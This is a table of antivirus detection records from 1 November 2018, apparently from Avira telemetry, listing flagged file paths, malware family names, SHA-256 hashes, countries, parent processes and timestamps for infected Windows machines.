  Row(detection=Row(filename='avscan-20181101-092454-4c057260', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_92d4ac87\\AVSCAN-20181101-092438-4A238393\\AVSCAN-20181101-092454-4C057260', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:24:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:19:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:27:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:01:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:05:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:01:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:20:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T04:02:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T06:07:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:42:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:20:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:25:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:01:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:31:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091747-0205ca10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_822e453a\\AVSCAN-20181101-091736-FFD256FF\\AVSCAN-20181101-091747-0205CA10', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:17:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:22:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:00:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T23:09:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T23:11:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:42:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:51:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:10:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083328-821efe6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dbed97bb\\AVSCAN-20181101-083316-7FB2D686\\AVSCAN-20181101-083328-821EFE6C', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:33:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:34:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:41:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:00:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:00:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:15:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-085438-f367b67e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8de92a44\\AVSCAN-20181101-085421-F0FC28BE\\AVSCAN-20181101-085438-F367B67E', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:54:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:30:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scan.exe', filepath='\\\\Shop-mep\\SCAN\\SCAN.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='3c2908cb1415735683089ca58342f4e9ddb26f1c99735ed9e1aa3daa68dd44ea', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-01T06:46:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scan.exe', filepath='\\\\Shop-mep\\SCAN\\SCAN.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='3c2908cb1415735683089ca58342f4e9ddb26f1c99735ed9e1aa3daa68dd44ea', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-01T06:46:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134717-a44c187d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b1dc482e\\AVSCAN-20181101-134657-9FD71A88\\AVSCAN-20181101-134717-A44C187D', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='3c2908cb1415735683089ca58342f4e9ddb26f1c99735ed9e1aa3daa68dd44ea', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:47:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scan.exe', filepath='\\\\Shop-mep\\SCAN\\SCAN.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='3c2908cb1415735683089ca58342f4e9ddb26f1c99735ed9e1aa3daa68dd44ea', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-01T06:46:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sentineldrv32support.exe', filepath='C:\\Program Files\\Common Files\\SafeNet Sentinel\\Sentinel System Driver\\SentinelDrv32Support.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='3c3fa414cc0379e2ebe2f84e4cfec87c7fb0aadb4134ecb09ac91ea9bf937926', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Yp\\\\\\/eHlq3n0eDGW+z.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=116928, timestamp='2018-11-01T08:09:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes731\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='3c62c512ced629a03d08b8bd48dfc67b23a6d2c7ac7aaf73e307c050806188bc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe778_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe778 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:41:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes731\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='3c62c512ced629a03d08b8bd48dfc67b23a6d2c7ac7aaf73e307c050806188bc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:38:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes731\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='3c62c512ced629a03d08b8bd48dfc67b23a6d2c7ac7aaf73e307c050806188bc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe782_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe782 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:41:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-224820-f218212a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d2ec22ab\\AVSCAN-20181031-223233-9671A702\\AVSCAN-20181031-224820-F218212A', filesize=128000, name='WORM/Autorun.bggd.#M1.#R1'), hash='3d3934b0c0564b390566e9ecbe66fc38a503499921e7c1b3e9e45558c69888cc', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:46:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='initwain.exe', filepath='C:\\Program Files (x86)\\Nuance\\PaperPort\\initwain.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='3d53931f1402e34996fee1c43dc6424521d912037ec0ac0c37f24647c4212cd2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:cq+iK4ml30qBCagj.1', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T02:07:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172339-dcee1944', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-171731-A569503C\\AVSCAN-20181101-172339-DCEE1944', filesize=64000, name='W97M/Agent.8759332.#M1.#R1'), hash='3d7c83e4bfd3c9b1c7ddf83c90b210e4259c466522bda4bf95212908aabc3b7b', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:23:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rhzkhe5', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RHZKHE5', filesize=64000, name='W97M/Agent.8759332.#M1.#R1'), hash='3d7c83e4bfd3c9b1c7ddf83c90b210e4259c466522bda4bf95212908aabc3b7b', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:16:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mdlup.exe', filepath='\\\\?\\C:\\eBridge\\bin\\MDLUp.EXE', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='3da2601d1a0ec4b1a1e8448a303aee446d57d02f17ca151b953ea8527f7dc342', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:32:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~pp35a.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~pp35A.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~pp42ac.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~pp42AC.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:59:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~pp9242.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~pp9242.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~pp9242.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~pp9242.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~ppaf11.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~ppAF11.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:07:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184739-e753255f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36beaaea\\AVSCAN-20181101-184718-E3B26560\\AVSCAN-20181101-184739-E753255F', filesize=13824000, name='HEUR/AGEN.1035113.#M1.#R1'), hash='3e1ec31401bc1d02c0caf1c6955de4aed1e29063c27410aa9a2082ccd09befc3', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:48:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='天龙小蜜[0920.1].exe', filepath='C:\\Users\\X\\Documents\\我的YY\\977504962\\新建文件夹\\天龙小蜜[0920.1].exe', filesize=13824000, name='HEUR/AGEN.1035113.#M1.#R1'), hash='3e1ec31401bc1d02c0caf1c6955de4aed1e29063c27410aa9a2082ccd09befc3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe375_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe375 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T10:47:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='天龙小蜜[0920.1].exe', filepath='C:\\Users\\X\\Documents\\我的YY\\977504962\\新建文件夹\\天龙小蜜[0920.1].exe', filesize=13824000, name='HEUR/AGEN.1035113.#M1.#R1'), hash='3e1ec31401bc1d02c0caf1c6955de4aed1e29063c27410aa9a2082ccd09befc3', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\YY\\yy\\YY.exe', parentsize=128240, timestamp='2018-11-01T10:47:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mi-agenda-personal-programas-gratis-net_2309201249.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\mi-agenda-personal-programas-gratis-net_2309201249.exe', filesize=1664000, name='PUA/AD.InstallCore.B.#M1.#R1'), hash='3e59ba4561b40b6d4e4bc1d6638a01bf01b006e25010c592a549fd4ad2a48e8d', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:59:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmcuninstall.exe', filepath='I:\\Program Files\\SPT\\Driver\\Samsung Agere GSM USB Driver Ver 4.20\\agsm_v4_20\\WMCUninstall.exe', filesize=2560000, name='W32/Ramnit.C.#M1.#R1'), hash='3ea6d68e3f3b6010a57bf5b30b44382a2e901786e425bb4369da8c195d5c7e69', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:01:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201225-613779c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b5269777\\AVSCAN-20181101-195711-EC7B5239\\AVSCAN-20181101-201225-613779C1', filesize=384000, name='TR/Dropper.Gen.#M1.#R1'), hash='3ed509d7adfcc4c99f6f3d12bb7a72a9316b0fbf56e695bf83ea6c9b0c61fd43', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:47:35Z'), dt=datetime.date(2018, 11, 1)),
